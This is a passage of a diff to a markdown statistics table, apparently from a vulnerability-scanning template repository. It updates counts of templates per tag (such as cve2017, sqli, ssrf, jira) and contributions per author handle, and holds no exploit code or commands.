11 | | | | | | | +| cve2017 | 50 | wdahlenb | 10 | | | | | | | +| unauth | 47 | righettod | 10 | | | | | | | | file | 46 | random_robbie | 10 | | | | | | | -| network | 41 | hackergautam | 9 | | | | | | | +| network | 42 | nadino | 9 | | | | | | | | sqli | 38 | melbadry9 | 9 | | | | | | | -| ssrf | 37 | nadino | 9 | | | | | | | -| oracle | 36 | that_juan_ | 8 | | | | | | | +| ssrf | 38 | hackergautam | 9 | | | | | | | +| | 37 | that_juan_ | 8 | | | | | | | +| oracle | 36 | iamthefrogy | 8 | | | | | | | | cve2016 | 36 | aashiq | 8 | | | | | | | -| | 36 | iamthefrogy | 8 | | | | | | | -| redirect | 33 | kophjager007 | 7 | | | | | | | -| logs | 30 | randomstr1ng | 7 | | | | | | | -| jira | 28 | emadshanab | 7 | | | | | | | +| redirect | 33 | harshbothra_ | 7 | | | | | | | +| logs | 30 | emadshanab | 7 | | | | | | | +| jira | 28 | randomstr1ng | 7 | | | | | | | | atlassian | 27 | techryptic (@tech) | 7 | | | | | | | -| listing | 27 | dr_set | 7 | | | | | | | -| misc | 23 | dogasantos | 7 | | | | | | | -| cve2015 | 23 | 0x240x23elu | 7 | | | | | | | -| disclosure | 21 | harshbothra_ | 7 | | | | | | | -| auth-bypass | 20 | oppsec | 7 | | | | | | | -| generic | 20 | meme-lord | 7 | | | | | | | -| cisco | 19 | caspergn | 6 | | | | | | | -| router | 19 | logicalhunter | 6 | | | | | | | +| listing | 27 | oppsec | 7 | | | | | | | +| cve2015 | 24 | kophjager007 | 7 | | | | | | | +| misc | 23 | 0x240x23elu | 7 | | | | | | | +| disclosure | 22 | dogasantos | 7 | | | | | | | +| auth-bypass | 21 | dr_set | 7 | | | | | | | +| generic | 21 | meme-lord | 7 | | | | | | | | aem | 19 | __fazal | 6 | | | | | | | -| misconfig | 18 | pentest_swissky | 6 | | | | | | | -| sap | 18 | puzzlepeaches | 6 | | | | | | | -| cve2014 | 18 | elsfa7110 | 5 | | | | | | | -| debug | 18 | rootxharsh | 5 | | | | | | | +| router | 19 | puzzlepeaches | 6 | | | | | | | +| cisco | 19 | pentest_swissky | 6 | | | | | | | +| cve2014 | 19 | logicalhunter | 6 | | | | | | | +| debug | 18 | caspergn | 6 | | | | | | | +| sap | 18 | ganofins | 5 | | | | | | | +| misconfig | 18 | yanyun | 5 | | | | | | | | springboot | 18 | panch0r3d | 5 | | | | | | | -| php | 16 | yanyun | 5 | | | | | | | -| fuzz | 14 | ganofins | 5 | | | | | | | -| struts | 14 | iamnoooob | 5 | | | | | | | +| php | 16 | iamnoooob | 5 | | | | | | | | weblogic | 14 | joanbono | 5 | | | | | | | +| struts | 14 | elsfa7110 | 5 | | | | | | | +| fuzz | 14 | rootxharsh | 5 | | | | | | | +| cve2011 | 14 | lu4nx | 4 | | | | | | | | login | 14 | nodauf | 4 | | | | | | | -| cve2011 | 14 | xelkomy | 4 | | | | | | | -| cve2012 | 14 | e_schultze_ | 4 | | | | | | | -| adobe | 13 | lu4nx | 4 | | | | | | | +| cve2012 | 14 | xelkomy | 4 | | | | | | | | devops | 13 | github.com/its0x08 | 4 | | | | | | | -| dns | 13 | johnk3r | 3 | | | | | | | -| zoho | 13 | unstabl3 | 3 | | | | | | | -| android | 13 | jarijaas | 3 | | | | | | | -| jenkins | 12 | shifacyclewala | 3 | | | | | | | -| dlink | 12 | incogbyte | 3 | | | | | | | -| aws | 12 | vsh00t | 3 | | | | | | | -| manageengine | 12 | tess | 3 | | | | | | | -| cve2013 | 11 | thomas_from_offensity | 3 | | | | | | | -| wp-theme | 11 | impramodsargar | 3 | | | | | | | -| dell | 10 | fyoorer | 3 | | | | | | | -| xxe | 10 | z3bd | 3 | | | | | | | -| magento | 9 | mavericknerd | 3 | | | | | | | -| intrusive | 9 | 0w4ys | 3 | | | | | | | -| ftp | 9 | skeltavik | 3 | | | | | | | -| gitlab | 8 | yash anand @yashanand155 | 3 | | | | | | | -| scada | 8 | f1tz | 3 | | | | | | | -| rails | 8 | dudez | 3 | | | | | | | -| vmware | 8 | emenalf | 3 | | | | | | | -| ruijie | 8 | binaryfigments | 3 | | | | | | | -| cnvd | 8 | sushantkamble | 3 | | | | | | | -| airflow | 8 | _generic_human_ | 3 | | | | | | | -| nginx | 8 | idealphase | 3 | | | | | | | -| google | 7 | shine | 3 | | | | | | | -| ibm | 7 | johnjhacking | 2 | | | | | | | -| cms | 7 | whoever | 2 | | | | | | | -| backup | 7 | pxmme1337 | 2 | | | | | | | -| coldfusion | 7 | randomrobbie | 2 | | | | | | | -| microsoft | 7 | 0xcrypto | 2 | | | | | | | -| netgear | 7 | arcc | 2 | | | | | | | -| cve2009 | 7 | lotusdll | 2 | | | | | | | -| files | 7 | joeldeleep | 2 | | | | | | | -| confluence | 7 | amsda | 2 | | | | | | | -| kubernetes | 7 | g4l1t0 | 2 | | | | | | | -| api | 6 | manas_harsh | 2 | | | | | | | +| dns | 13 | e_schultze_ | 4 | | | | | | | +| android | 13 | idealphase | 3 | | | | | | | +| zoho | 13 | 0w4ys | 3 | | | | | | | +| adobe | 13 | binaryfigments | 3 | | | | | | | +| aws | 12 | johnk3r | 3 | | | | | | | +| dlink | 12 | skeltavik | 3 | | | | | | | +| jenkins | 12 | impramodsargar | 3 | | | | | | | +| manageengine | 12 | emenalf | 3 | | | | | | | +| wp-theme | 11 | dudez | 3 | | | | | | | +| cve2013 | 11 | z3bd | 3 | | | | | | | +| dell | 10 | jarijaas | 3 | | | | | | | +| xxe | 10 | mavericknerd | 3 | | | | | | | +| magento | 9 | tess | 3 | | | | | | | +| ftp | 9 | unstabl3 | 3 | | | | | | | +| intrusive | 9 | shifacyclewala | 3 | | | | | | | +| ruijie | 8 | sushantkamble | 3 | | | | | | | +| airflow | 8 | fyoorer | 3 | | | | | | | +| nginx | 8 | thomas_from_offensity | 3 | | | | | | | +| scada | 8 | vsh00t | 3 | | | | | | | +| vmware | 8 | _generic_human_ | 3 | | | | | | | +| cnvd | 8 | shine | 3 | | | | | | | +| rails | 8 | incogbyte | 3 | | | | | | | +| gitlab | 8 | f1tz | 3 | | | | | | | +| confluence | 7 | yash anand @yashanand155 | 3 | | | | | | | +| coldfusion | 7 | r3naissance | 2 | | | | | | | +| netgear | 7 | moritz nentwig | 2 | | | | | | | +| backup | 7 | 0xprial | 2 | | | | | | | +| google | 7 | bp0lr | 2 | | | | | | | +| kubernetes | 7 | lotusdll | 2 | | | | | | | +| cve2009 | 7 | huowuzhao | 2 | | | | | | | +| files | 7 | swissky | 2 | | | | | | | +| ibm | 7 | 0xelkomy | 2 | | | | | | | +| microsoft | 7 | alifathi-h1 | 2 | | | | | | | +| cms | 7 | fabaff | 2 | | | | | | | +| solr | 6 | afaq | 2 | | | | | | | +| camera | 6 | foulenzer | 2 | | | | | | | +| laravel | 6 | parth | 2 | | | | | | | +| docker | 6 | 0xrudra | 2 | | | | | | | +| cve2008 | 6 | cocxanh | 2 | | | | | | | | django | 6 | hetroublemakr | 2 | | | | | | | -| solr | 6 | davidmckennirey | 2 | | | | | | | -| laravel | 6 | 0xelkomy | 2 | | | | | | | -| rconfig | 6 | kiblyn11 | 2 | | | | | | | -| cve2008 | 6 | koti2 | 2 | | | | | | | -| citrix | 6 | bing0o | 2 | | | | | | | -| jetty | 6 | alifathi-h1 | 2 | | | | | | | -| docker | 6 | udit_thakkur | 2 | | | | | | | -| ssti | 5 | r3naissance | 2 | | | | | | | -| java | 5 | cocxanh | 2 | | | | | | | -| windows | 5 | hahwul | 2 | | | | | | | -| lucee | 5 | random-robbie | 2 | | | | | | | -| dedecms | 5 | socketz | 2 | | | | | | | +| jetty | 6 | x1m_martijn | 2 | | | | | | | +| citrix | 6 | udit_thakkur | 2 | | | | | | | +| rconfig | 6 | ehsahil | 2 | | | | | | | +| api | 6 | kiblyn11 | 2 | | | | | | | +| deserialization | 5 | johnjhacking | 2 | | | | | | | +| phpmyadmin | 5 | bsysop | 2 | | | | | | | +| java | 5 | pxmme1337 | 2 | | | | | | | +| tomcat | 5 | bing0o | 2 | | | | | | | +| fileupload | 5 | koti2 | 2 | | | | | | | +| dedecms | 5 | 0xsmiley | 2 | | | | | | | +| windows | 5 | amsda | 2 | | | | | | | +| headless | 5 | arcc | 2 | | | | | | | +| hp | 5 | nkxxkn | 2 | | | | | | | | circarlife | 5 | w4cky_ | 2 | | | | | | | -| printer | 5 | bernardofsr | 2 | | | | | | | -| phpmyadmin | 5 | x1m_martijn | 2 | | | | | | | -| hp | 5 | parth | 2 | | | | | | | -| iis | 5 | afaq | 2 | | | | | | | -| drupal | 5 | bsysop | 2 | | | | | | | -| headless | 5 | bp0lr | 2 | | | | | | | -| nodejs | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| deserialization | 5 | 0xprial | 2 | | | | | | | -| tomcat | 5 | ehsahil | 2 | | | | | | | -| fileupload | 5 | mohammedsaneem | 2 | | | | | | | -| jolokia | 5 | fabaff | 2 | | | | | | | -| grafana | 4 | gevakun | 2 | | | | | | | -| asp | 4 | swissky | 2 | | | | | | | -| samsung | 4 | zomsop82 | 2 | | | | | | | -| artifactory | 4 | nkxxkn | 2 | | | | | | | -| solarwinds | 4 | 0xsmiley | 2 | | | | | | | -| exchange | 4 | 0xsapra | 2 | | | | | | | -| traversal | 4 | vavkamil | 2 | | | | | | | -| firmware | 4 | huowuzhao | 2 | | | | | | | -| symfony | 4 | foulenzer | 2 | | | | | | | -| resin | 4 | convisoappsec | 2 | | | | | | | -| moodle | 4 | dheerajmadhukar | 2 | | | | | | | -| symantec | 4 | 0xrudra | 2 | | | | | | | -| camera | 4 | ree4pwn | 2 | | | | | | | -| strapi | 4 | moritz nentwig | 2 | | | | | | | -| webserver | 4 | gal nagli | 2 | | | | | | | -| thinkcmf | 4 | wabafet | 1 | | | | | | | -| magmi | 4 | affix | 1 | | | | | | | -| wso2 | 4 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| vpn | 4 | gboddin | 1 | | | | | | | -| git | 4 | shreyapohekar | 1 | | | | | | | -| proxy | 4 | j33n1k4 | 1 | | | | | | | -| hongdian | 4 | hakluke | 1 | | | | | | | -| buffalo | 4 | dawid-czarnecki | 1 | | | | | | | -| zabbix | 4 | @dwisiswant0 | 1 | | | | | | | -| thinkphp | 4 | ratnadip gajbhiye | 1 | | | | | | | -| glpi | 4 | b0rn2r00t | 1 | | | | | | | -| zimbra | 4 | ldionmarcil | 1 | | | | | | | -| crlf | 4 | juicypotato1 | 1 | | | | | | | -| elastic | 4 | sickwell | 1 | | | | | | | -| kevinlab | 3 | mass0ma | 1 | | | | | | | -| log | 3 | 0xtavian | 1 | | | | | | | -| itop | 3 | sy3omda | 1 | | | | | | | -| fpd | 3 | s1r1u5_ | 1 | | | | | | | -| bigip | 3 | soyelmago | 1 | | | | | | | -| ssh | 3 | b4uh0lz | 1 | | | | | | | -| r-seenet | 3 | schniggie | 1 | | | | | | | -| ebs | 3 | co0nan | 1 | | | | | | | -| terramaster | 3 | kishore krishna (sillydaddy) | 1 | | | | | | | -| targa | 3 | ipanda | 1 | | | | | | | -| smtp | 3 | elder tao | 1 | | | | | | | -| zhiyuan | 3 | cookiehanhoan | 1 | | | | | | | -| prometheus | 3 | 0ut0fb4nd | 1 | | | | | | | -| opensis | 3 | willd96 | 1 | | | | | | | -| microstrategy | 3 | borna nematzadeh | 1 | | | | | | | -| openam | 3 | vzamanillo | 1 | | | | | | | -| injection | 3 | tirtha_mandal | 1 | | | | | | | -| fanruan | 3 | streetofhackerr007 | 1 | | | | | | | -| httpd | 3 | kareemse1im | 1 | | | | | | | -| nexus | 3 | sullo | 1 | | | | | | | -| lfr | 3 | kabirsuda | 1 | | | | | | | -| jellyfin | 3 | toufik airane | 1 | | | | | | | -| ofbiz | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| openssh | 3 | andysvints | 1 | | | | | | | -| caucho | 3 | shifacyclewla | 1 | | | | | | | -| npm | 3 | noamrathaus | 1 | | | | | | | -| vbulletin | 3 | zandros0 | 1 | | | | | | | -| bitrix | 3 | remonsec | 1 | | | | | | | -| nosqli | 3 | izn0u | 1 | | | | | | | -| mail | 3 | berkdusunur | 1 | | | | | | | -| amazon | 3 | x6263 | 1 | | | | | | | -| springcloud | 3 | thezakman | 1 | | | | | | | -| kafka | 3 | luskabol | 1 | | | | | | | -| jeesns | 3 | aresx | 1 | | | | | | | -| nacos | 3 | deena | 1 | | | | | | | -| firebase | 3 | pdp | 1 | | | | | | | -| linkerd | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| iis | 5 | gal nagli | 2 | | | | | | | +| lucee | 5 | gevakun | 2 | | | | | | | +| drupal | 5 | convisoappsec | 2 | | | | | | | +| nodejs | 5 | ree4pwn | 2 | | | | | | | +| jolokia | 5 | 0xcrypto | 2 | | | | | | | +| ssti | 5 | davidmckennirey | 2 | | | | | | | +| printer | 5 | hahwul | 2 | | | | | | | +| samsung | 4 | mohammedsaneem | 2 | | | | | | | +| hongdian | 4 | random-robbie | 2 | | | | | | | +| moodle | 4 | bernardofsr | 2 | | | | | | | +| zabbix | 4 | whoever | 2 | | | | | | | +| firmware | 4 | 0xsapra | 2 | | | | | | | +| exchange | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| traversal | 4 | socketz | 2 | | | | | | | +| rfi | 4 | zomsop82 | 2 | | | | | | | +| symfony | 4 | joeldeleep | 2 | | | | | | | +| git | 4 | randomrobbie | 2 | | | | | | | +| symantec | 4 | vavkamil | 2 | | | | | | | +| thinkcmf | 4 | g4l1t0 | 2 | | | | | | | +| glpi | 4 | dheerajmadhukar | 2 | | | | | | | +| buffalo | 4 | manas_harsh | 2 | | | | | | | +| elastic | 4 | divya_mudgal | 1 | | | | | | | +| solarwinds | 4 | elmahdi | 1 | | | | | | | +| webserver | 4 | zandros0 | 1 | | | | | | | +| strapi | 4 | toufik airane | 1 | | | | | | | +| magmi | 4 | zhenwarx | 1 | | | | | | | +| artifactory | 4 | j3ssie/geraldino2 | 1 | | | | | | | +| proxy | 4 | alex | 1 | | | | | | | +| asp | 4 | yashanand155 | 1 | | | | | | | +| zimbra | 4 | blckraven | 1 | | | | | | | +| resin | 4 | 0xtavian | 1 | | | | | | | +| vpn | 4 | _harleo | 1 | | | | | | | +| crlf | 4 | philippdelteil | 1 | | | | | | | +| thinkphp | 4 | absshax | 1 | | | | | | | +| grafana | 4 | d0rkerdevil | 1 | | | | | | | +| wso2 | 4 | apt-mirror | 1 | | | | | | | +| tikiwiki | 3 | kba@sogeti_esec | 1 | | | | | | | +| injection | 3 | yavolo | 1 | | | | | | | +| vbulletin | 3 | qlkwej | 1 | | | | | | | +| fanruan | 3 | sec_hawk | 1 | | | | | | | +| jeesns | 3 | mass0ma | 1 | | | | | | | +| log | 3 | 52971 | 1 | | | | | | | +| openssh | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| druid | 3 | adrianmf | 1 | | | | | | | -| oa | 3 | th3.d1p4k | 1 | | | | | | | -| telerik | 3 | mesaglio | 1 | | | | | | | -| hoteldruid | 3 | iampritam | 1 | | | | | | | -| kibana | 3 | _harleo | 1 | | | | | | | -| mongodb | 3 | kre80r | 1 | | | | | | | -| backups | 3 | revblock | 1 | | | | | | | -| slack | 3 | notsoevilweasel | 1 | | | | | | | -| tikiwiki | 3 | qlkwej | 1 | | | | | | | -| cacti | 3 | fopina | 1 | | | | | | | -| ucmdb | 2 | ahmetpergamum | 1 | | | | | | | -| node | 2 | its0x08 | 1 | | | | | | | -| service | 2 | 0xrod | 1 | | | | | | | -| avantfax | 2 | aaron_costello | 1 | | | | | | | +| fpd | 3 | x6263 | 1 | | | | | | | +| microstrategy | 3 | intx0x80 | 1 | | | | | | | +| openam | 3 | patralos | 1 | | | | | | | +| telerik | 3 | pudsec | 1 | | | | | | | +| lfr | 3 | sickwell | 1 | | | | | | | +| bigip | 3 | defr0ggy | 1 | | | | | | | +| firebase | 3 | 0ut0fb4nd | 1 | | | | | | | +| hoteldruid | 3 | remonsec | 1 | | | | | | | +| oa | 3 | willd96 | 1 | | | | | | | +| npm | 3 | jteles | 1 | | | | | | | +| ssh | 3 | xstp | 1 | | | | | | | +| bitrix | 3 | luci | 1 | | | | | | | +| nexus | 3 | @github.com/defr0ggy | 1 | | | | | | | +| caucho | 3 | bjhulst | 1 | | | | | | | +| terramaster | 3 | shifacyclewla | 1 | | | | | | | +| slack | 3 | j33n1k4 | 1 | | | | | | | +| zhiyuan | 3 | b4uh0lz | 1 | | | | | | | +| mail | 3 | petruknisme | 1 | | | | | | | +| nosqli | 3 | shelld3v | 1 | | | | | | | +| smtp | 3 | kareemse1im | 1 | | | | | | | +| ebs | 3 | borna nematzadeh | 1 | | | | | | | +| prometheus | 3 | sshell | 1 | | | | | | | +| springcloud | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| nacos | 3 | adrianmf | 1 | | | | | | | +| kibana | 3 | raesene | 1 | | | | | | | +| kafka | 3 | elder tao | 1 | | | | | | | +| druid | 3 | udyz | 1 | | | | | | | +| amazon | 3 | me9187 | 1 | | | | | | | +| itop | 3 | 0h1in9e | 1 | | | | | | | +| linkerd | 3 | mhdsamx | 1 | | | | | | | +| httpd | 3 | deena | 1 | | | | | | | +| ofbiz | 3 | thezakman | 1 | | | | | | | +| r-seenet | 3 | wabafet | 1 | | | | | | | +| opensis | 3 | un-fmunozs | 1 | | | | | | | +| targa | 3 | schniggie | 1 | | | | | | | +| cacti | 3 | th3.d1p4k | 1 | | | | | | | +| backups | 3 | alph4byt3 | 1 | | | | | | | +| kevinlab | 3 | bolli95 | 1 | | | | | | | +| mongodb | 3 | ohlinge | 1 | | | | | | | +| jellyfin | 3 | fmunozs | 1 | | | | | | | +| liferay | 2 | ratnadip gajbhiye | 1 | | | | | | | +| ecoa | 2 | kabirsuda | 1 | | | | | | | +| sitecore | 2 | @dwisiswant0 | 1 | | | | | | | +| showdoc | 2 | smaranchand | 1 | | | | | | | +| ilo | 2 | undefl0w | 1 | | | | | | | +| sharepoint | 2 | co0nan | 1 | | | | | | | +| avantfax | 2 | retr0 | 1 | | | | | | | +| nextcloud | 2 | sicksec | 1 | | | | | | | +| icewarp | 2 | ahmetpergamum | 1 | | | | | | | +| flir | 2 | micha3lb3n | 1 | | | | | | | +| aruba | 2 | aaron_costello | 1 | | | | | | | | | | (@conspiracyproof) | | | | | | | | -| waf | 2 | jeya seelan | 1 | | | | | | | -| liferay | 2 | shelld3v | 1 | | | | | | | -| pega | 2 | chron0x | 1 | | | | | | | -| oauth | 2 | apt-mirror | 1 | | | | | | | -| minio | 2 | yashgoti | 1 | | | | | | | -| github | 2 | fmunozs | 1 | | | | | | | -| akkadian | 2 | retr0 | 1 | | | | | | | -| rstudio | 2 | sshell | 1 | | | | | | | -| natshell | 2 | brabbit10 | 1 | | | | | | | -| guacamole | 2 | zhenwarx | 1 | | | | | | | -| frp | 2 | j3ssie/geraldino2 | 1 | | | | | | | -| aruba | 2 | kba@sogeti_esec | 1 | | | | | | | -| idrac | 2 | mhdsamx | 1 | | | | | | | -| middleware | 2 | rojanrijal | 1 | | | | | | | -| flir | 2 | daviey | 1 | | | | | | | -| smb | 2 | philippdelteil | 1 | | | | | | | -| bruteforce | 2 | 0h1in9e | 1 | | | | | | | -| backdoor | 2 | exploitation | 1 | | | | | | | -| ec2 | 2 | alex | 1 | | | | | | | -| getsimple | 2 | bolli95 | 1 | | | | | | | -| couchdb | 2 | knassar702 | 1 | | | | | | | -| dolibarr | 2 | patralos | 1 | | | | | | | -| hasura | 2 | geraldino2 | 1 | | | | | | | -| cve2007 | 2 | tim_koopmans | 1 | | | | | | | -| wordfence | 2 | ilovebinbash | 1 | | | | | | | -| icewarp | 2 | c3l3si4n | 1 | | | | | | | -| maian | 2 | petruknisme | 1 | | | | | | | -| ecology | 2 | divya_mudgal | 1 | | | | | | | -| horde | 2 | pudsec | 1 | | | | | | | -| ilo | 2 | sec_hawk | 1 | | | | | | | -| enumeration | 2 | evolutionsec | 1 | | | | | | | -| axis | 2 | akash.c | 1 | | | | | | | -| seeyon | 2 | makyotox | 1 | | | | | | | -| hpe | 2 | infosecsanyam | 1 | | | | | | | -| prestashop | 2 | push4d | 1 | | | | | | | -| activemq | 2 | mah3sec_ | 1 | | | | | | | -| yapi | 2 | taielab | 1 | | | | | | | -| bucket | 2 | sicksec | 1 | | | | | | | -| linux | 2 | ringo | 1 | | | | | | | -| prtg | 2 | luci | 1 | | | | | | | -| favicon | 2 | naglinagli | 1 | | | | | | | -| azure | 2 | ooooooo_q | 1 | | | | | | | -| xxljob | 2 | alperenkesk | 1 | | | | | | | -| db | 2 | me9187 | 1 | | | | | | | -| qcubed | 2 | udyz | 1 | | | | | | | -| netis | 2 | intx0x80 | 1 | | | | | | | -| chiyu | 2 | aceseven (digisec360) | 1 | | | | | | | -| sharepoint | 2 | bernardo rodrigues | 1 | | | | | | | +| status | 2 | c3l3si4n | 1 | | | | | | | +| cache | 2 | taielab | 1 | | | | | | | +| guacamole | 2 | hakluke | 1 | | | | | | | +| netsweeper | 2 | its0x08 | 1 | | | | | | | +| xxljob | 2 | aresx | 1 | | | | | | | +| openvpn | 2 | soyelmago | 1 | | | | | | | +| enumeration | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| leak | 2 | andirrahmani1 | 1 | | | | | | | +| spark | 2 | ldionmarcil | 1 | | | | | | | +| bypass | 2 | akash.c | 1 | | | | | | | +| storage | 2 | affix | 1 | | | | | | | +| phpcollab | 2 | kre80r | 1 | | | | | | | +| bucket | 2 | mah3sec_ | 1 | | | | | | | +| keycloak | 2 | pdp | 1 | | | | | | | +| ec2 | 2 | brabbit10 | 1 | | | | | | | +| netis | 2 | akshansh | 1 | | | | | | | +| akkadian | 2 | tirtha_mandal | 1 | | | | | | | +| axis | 2 | b0rn2r00t | 1 | | | | | | | +| mcafee | 2 | _c0wb0y_ | 1 | | | | | | | +| qcubed | 2 | daviey | 1 | | | | | | | +| totemomail | 2 | thevillagehacker | 1 | | | | | | | +| mida | 2 | flag007 | 1 | | | | | | | +| fortios | 2 | furkansenan | 1 | | | | | | | +| hpe | 2 | naglinagli | 1 | | | | | | | +| prtg | 2 | streetofhackerr007 | 1 | | | | | | | +| vrealize | 2 | 0xteles | 1 | | | | | | | +| glassfish | 2 | hanlaomo | 1 | | | | | | | +| linux | 2 | mubassirpatel | 1 | | | | | | | +| webcam | 2 | ajaysenr | 1 | | | | | | | +| sonarqube | 2 | rodnt | 1 | | | | | | | +| natshell | 2 | whynotke | 1 | | | | | | | +| waf | 2 | rotemreiss | 1 | | | | | | | +| hashicorp | 2 | gboddin | 1 | | | | | | | +| prestashop | 2 | iampritam | 1 | | | | | | | +| adminer | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| grav | 2 | andysvints | 1 | | | | | | | +| frp | 2 | nerrorsec | 1 | | | | | | | +| harbor | 2 | sy3omda | 1 | | | | | | | +| backdoor | 2 | b0yd | 1 | | | | | | | +| paloalto | 2 | fopina | 1 | | | | | | | +| voipmonitor | 2 | sullo | 1 | | | | | | | +| yapi | 2 | knassar702 | 1 | | | | | | | +| middleware | 2 | manuelbua | 1 | | | | | | | +| rstudio | 2 | bad5ect0r | 1 | | | | | | | +| cve2005 | 2 | _darrenmartyn | 1 | | | | | | | +| commax | 2 | yashgoti | 1 | | | | | | | +| nextjs | 2 | ooooooo_q | 1 | | | | | | | +| favicon | 2 | dawid-czarnecki | 1 | | | | | | | +| minio | 2 | omarkurt | 1 | | | | | | | +| rockmongo | 2 | ahmed sherif | 1 | | | | | | | +| ecology | 2 | geraldino2 | 1 | | | | | | | +| kentico | 2 | regala_ | 1 | | | | | | | +| trixbox | 2 | ipanda | 1 | | | | | | | +| activemq | 2 | cookiehanhoan | 1 | | | | | | | +| yii | 2 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| sonicwall | 2 | jteles | 1 | | | | | | | -| bypass | 2 | nerrorsec | 1 | | | | | | | -| hostheader-injection | 2 | thevillagehacker | 1 | | | | | | | -| saltstack | 2 | 0xteles | 1 | | | | | | | -| igs | 2 | hanlaomo | 1 | | | | | | | -| leak | 2 | micha3lb3n | 1 | | | | | | | -| nextjs | 2 | flag007 | 1 | | | | | | | -| shellshock | 2 | whynotke | 1 | | | | | | | -| cve2005 | 2 | regala_ | 1 | | | | | | | -| sitecore | 2 | alph4byt3 | 1 | | | | | | | -| hjtcloud | 2 | smaranchand | 1 | | | | | | | -| yii | 2 | ohlinge | 1 | | | | | | | -| keycloak | 2 | furkansenan | 1 | | | | | | | -| openfire | 2 | d0rkerdevil | 1 | | | | | | | -| plesk | 2 | manuelbua | 1 | | | | | | | -| adminer | 2 | elmahdi | 1 | | | | | | | -| jboss | 2 | defr0ggy | 1 | | | | | | | -| webcam | 2 | yashanand155 | 1 | | | | | | | -| akamai | 2 | becivells | 1 | | | | | | | -| cache | 2 | bad5ect0r | 1 | | | | | | | -| grav | 2 | rotemreiss | 1 | | | | | | | -| totemomail | 2 | un-fmunozs | 1 | | | | | | | -| storage | 2 | absshax | 1 | | | | | | | -| jeedom | 2 | _darrenmartyn | 1 | | | | | | | -| kentico | 2 | @github.com/defr0ggy | 1 | | | | | | | -| spark | 2 | ajaysenr | 1 | | | | | | | -| mida | 2 | nytr0gen | 1 | | | | | | | -| splunk | 2 | 52971 | 1 | | | | | | | -| sonarqube | 2 | pratik khalane | 1 | | | | | | | -| dos | 2 | blckraven | 1 | | | | | | | -| axis2 | 2 | bjhulst | 1 | | | | | | | -| odoo | 2 | ahmed sherif | 1 | | | | | | | -| showdoc | 2 | andirrahmani1 | 1 | | | | | | | -| jsf | 2 | rodnt | 1 | | | | | | | -| glassfish | 2 | raesene | 1 | | | | | | | -| phpcollab | 2 | yavolo | 1 | | | | | | | -| chamilo | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| fortios | 2 | undefl0w | 1 | | | | | | | -| kong | 2 | b0yd | 1 | | | | | | | -| harbor | 2 | xstp | 1 | | | | | | | -| paloalto | 2 | _c0wb0y_ | 1 | | | | | | | -| nextcloud | 2 | kurohost | 1 | | | | | | | -| netsweeper | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| wuzhicms | 2 | mubassirpatel | 1 | | | | | | | -| huawei | 2 | akshansh | 1 | | | | | | | -| emerge | 2 | omarkurt | 1 | | | | | | | -| status | 2 | | | | | | | | | +| node | 2 | vzamanillo | 1 | | | | | | | +| chiyu | 2 | alperenkesk | 1 | | | | | | | +| horde | 2 | nytr0gen | 1 | | | | | | | +| shellshock | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| dos | 2 | notsoevilweasel | 1 | | | | | | | +| azure | 2 | revblock | 1 | | | | | | | +| huawei | 2 | oscarintherocks | 1 | | | | | | | +| github | 2 | berkdusunur | 1 | | | | | | | +| dolibarr | 2 | izn0u | 1 | | | | | | | +| couchdb | 2 | mesaglio | 1 | | | | | | | +| oauth | 2 | kurohost | 1 | | | | | | | +| bruteforce | 2 | juicypotato1 | 1 | | | | | | | +| splunk | 2 | ringo | 1 | | | | | | | +| hasura | 2 | pratik khalane | 1 | | | | | | | +| akamai | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | +| wordfence | 2 | ilovebinbash | 1 | | | | | | | +| sonicwall | 2 | infosecsanyam | 1 | | | | | | | +| saltstack | 2 | push4d | 1 | | | | | | | +| db | 2 | aceseven (digisec360) | 1 | | | | | | | +| plesk | 2 | s1r1u5_ | 1 | | | | | | | +| openfire | 2 | rojanrijal | 1 | | | | | | | +| cve2007 | 2 | evolutionsec | 1 | | | | | | | +| smb | 2 | exploitation | 1 | | | | | | | +| kong | 2 | jeya seelan | 1 | | | | | | | +| getsimple | 2 | noamrathaus | 1 | | | | | | | +| jsf | 2 | becivells | 1 | | | | | | | +| emerge | 2 | tim_koopmans | 1 | | | | | | | +| igs | 2 | chron0x | 1 | | | | | | | +| seeyon | 2 | makyotox | 1 | | | | | | | +| nagios | 2 | 0xrod | 1 | | | | | | | +| axis2 | 2 | luskabol | 1 | | | | | | | +| globalprotect | 2 | shreyapohekar | 1 | | | | | | | +| maian | 2 | | | | | | | | | +| jeedom | 2 | | | | | | | | | +| hostheader-injection | 2 | | | | | | | | | +| hjtcloud | 2 | | | | | | | | | +| idrac | 2 | | | | | | | | | | geowebserver | 2 | | | | | | | | | -| voipmonitor | 2 | | | | | | | | | -| nagios | 2 | | | | | | | | | -| globalprotect | 2 | | | | | | | | | -| trixbox | 2 | | | | | | | | | -| hashicorp | 2 | | | | | | | | | -| rockmongo | 2 | | | | | | | | | -| mcafee | 2 | | | | | | | | | -| vrealize | 2 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| craftcms | 1 | | | | | | | | | -| bigbluebutton | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| announcekit | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| sureline | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| asus | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| mara | 